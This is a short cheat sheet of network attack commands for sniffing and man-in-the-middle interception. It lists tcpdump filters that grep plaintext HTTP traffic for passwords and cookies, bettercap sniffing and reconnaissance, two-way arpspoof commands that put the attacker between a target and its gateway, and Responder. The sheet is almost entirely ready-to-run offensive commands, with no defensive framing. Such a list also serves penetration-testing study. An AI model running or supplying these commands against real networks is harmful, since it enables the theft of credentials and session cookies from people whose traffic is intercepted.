Sniffing and MitM attack (Man-in-the-middle attack)

Tcpdump

tcpdump -i <interface>
tcpdump -i <interface> -v src <source-IP-address> and dst <destination-IP-address> and port <port>
tcpdump -i <interface> -v port 80 | egrep -i "POST /|GET /|Host:"
tcpdump -i <interface> -v port 80 | egrep -i "POST /|GET /|clave=|pwd=|passwd=|password=|Host:"
tcpdump -i <interface> -v port 80 | egrep -i "Set-Cookie:|Cookie:|Host:"
tcpdump -r <file.pcap>

Ettercap

ettercap -G

Bettercap

# General
bettercap
net.probe on
net.recon on
net.sniff on
net.show
events.show

# Interface selection
bettercap -iface <interface>

# Sniffing a specific host and port
set net.sniff.filter "host <IP-address> and port <port>"
net.sniff on
events.show

# User interface (user:pass)
bettercap -caplet http-ui

ARPspoof

arpspoof -i <interface> -t <gateway-IP-address> <target-IP-address>
arpspoof -i <interface> -t <target-IP-address> <gateway-IP-address>

Responder

responder -I <interface> -A
